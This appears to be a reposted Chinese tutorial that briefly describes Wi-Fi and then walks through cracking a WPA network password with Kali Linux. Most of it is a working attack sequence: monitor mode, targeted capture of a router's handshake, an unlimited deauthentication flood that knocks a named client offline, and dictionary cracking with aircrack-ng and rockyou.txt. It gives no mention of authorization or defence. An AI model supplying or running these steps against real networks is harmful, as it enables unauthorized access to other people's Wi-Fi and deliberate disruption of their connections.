0x00 什么是wifi
　　Wi-Fi是一种允许电子设备连接到一个无线局域网（WLAN）的技术，通常使用2.4G UHF或5G SHF ISM 
　　射频频段。连接到无线局域网通常是有密码保护的；但也可是开放的，这样就允许任何在WLAN范围内
　　的设备可以连接上。Wi-Fi是一个无线网络通信技术的品牌，由Wi-Fi联盟所持有。目的是改善基于I
　　EEE 802.11标准的无线网路产品之间的互通性。有人把使用IEEE 802.11系列协议的局域网就称为无
　　线保真。甚至把Wi-Fi等同于无线网际网路（Wi-Fi是WLAN的重要组成部分）。
　　关于"Wi-Fi”这个缩写词的发音，根据英文标准韦伯斯特词典的读音注释，标准发音为/ˈwaɪ.faɪ/　　因为Wi-Fi这个单词是两个单词组成的，所以书写形式最好为WI-FI，这样也就不存在所谓专家所说
　　的读音问题，同理有HI-FI（/haɪ.faɪ/）。
　　2014年8月，网络安全研究人员鲁本·圣马尔塔表示，如果飞机WiFi开放度过高，可能会被黑客用于劫机。
　　0x01 环境准备
　　　　kail linux
　　　　无线网卡（如果你把kail linux装在虚拟机中，你需要usb无线网卡）
　　　　密码字典（一个好的字典决定成败）这里我使用的是kail linux中默认的字典
　　　　字典所在位置：/usr/share/wordlists
　　 0x02 前戏
　　 　　第一步：首先查看自己网卡的状态使用命令：ifconfig

                     prism0是开启监控模式之后才有的

        第二步：开启对无线网卡的监控模式：airmon-ng start wlan0

        第三步：扫描附近的wifi热点：airodump-ng  prism0

                BSSID 路由器 mac

                CH  信道

       第四步：抓取握手包：airodump-ng -c 1 --bssid 34:96:72:A5:62:1F -w msf prism0
　　 　　　　　　－c表示信道，在第三步中的ch，－－bssid 路由器ｍａｃ　－ｗ　抓取的握手包存放位置

        第五步：发起洪水攻击:aireplay-ng -0 0 -a 34:96:72:A5:62:1F -c C8:14:51:48:26:DF 
　　 　　　　　　prism0 --ignore-negative-one
　　 　　　　　　-0　    0表示不限制
　　 　　　　　　-a      路由器mac地址
　　 　　　　　　-c      链接路由器的mac地址 
　　 　　　　　　目的：让连接wifi的手机断网重连，这样的话我们就可以获取连接信息（握手包）

      0x03 利用抓到的握手包进行破解
　　   　　进行破解：aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/msf-01.cap
　　　　Opening /root/msf-01.cap

            破解成功密码
       0x04 总结
            其中两个地方比较耗时间，一个是抓握手包，一个就是破解了
            原文地址：